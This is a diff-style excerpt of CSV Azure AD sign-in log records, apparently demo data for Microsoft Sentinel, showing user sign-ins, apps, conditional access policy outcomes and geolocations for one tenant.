+1019,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:43.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0dcda76f-7788-4b0d-a344-e9ef3281caf5,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",6c1d2f35-9fdd-4afe-865b-10425cbe1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,6c1d2f35-9fdd-4afe-865b-10425cbe1400,SigninLogs,Sucess,41.90428925,-85.99833679
+1020,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:45.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9e31da4f-bad4-4d3c-b8f3-33fe0f486491,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",6c1d2f35-9fdd-4afe-865b-1042afbe1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,6c1d2f35-9fdd-4afe-865b-1042afbe1400,SigninLogs,Sucess,41.90428925,-85.99833679
+1021,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:53.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c0a397ce-0ebd-41f6-bdd6-fa62edea1e56,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",22fd8c7c-75eb-4549-80fa-1727f12f1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,22fd8c7c-75eb-4549-80fa-1727f12f1400,SigninLogs,Sucess,33.7984581,-84.38828278
+1022,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:15.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,faaa42c8-6dee-4716-b5a0-f51293f66ad7,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:38,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",db9d2eaf-e3fe-45a9-85f6-9cca060e1300,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,db9d2eaf-e3fe-45a9-85f6-9cca060e1300,SigninLogs,Sucess,50.6406517,5.572050095
+1023,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:29.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,01f9def9-6f9e-4682-9a0c-2eaac8aeec2a,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",6382c33b-18b0-46b9-982e-4aa9e98d1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,6382c33b-18b0-46b9-982e-4aa9e98d1200,SigninLogs,Sucess,33.7984581,-84.38828278
+1024,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:39.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ffd99713-55ff-4753-86a4-8a21c0ec8b6e,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",3b0e5c51-5aba-4adb-89c0-6eaba61a1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,3b0e5c51-5aba-4adb-89c0-6eaba61a1500,SigninLogs,Sucess,41.90428925,-85.99833679
+1025,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:13.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fc294554-290e-4b6b-a8b1-94fa36df2bb5,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",24b904d7-063a-4f4c-9637-40c7524d1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,24b904d7-063a-4f4c-9637-40c7524d1500,SigninLogs,Sucess,41.90428925,-85.99833679
+1026,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,26:10.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3ba70abd-1fdd-41ac-9bd0-1ac6a89652df,Microsoft.aadiam,Microsoft.aadiam,,Sentinel Partner Account 2,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:26,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Firefox 74.0'}",e82050b8-a2c4-426d-8c05-8f1d68870e00,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.19916999340057373, 'latitude': 51.49555969238281}, 'state': 'Greater London', 'city': 'Kensington And Chelsea'}",none,none,none,none,[],{'errorCode': 0},Sentinel Partner Account 2,2f3450f9-6201-430f-9235-25062d3f412b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,e82050b8-a2c4-426d-8c05-8f1d68870e00,SigninLogs,Sucess,51.49555969,-0.199169993
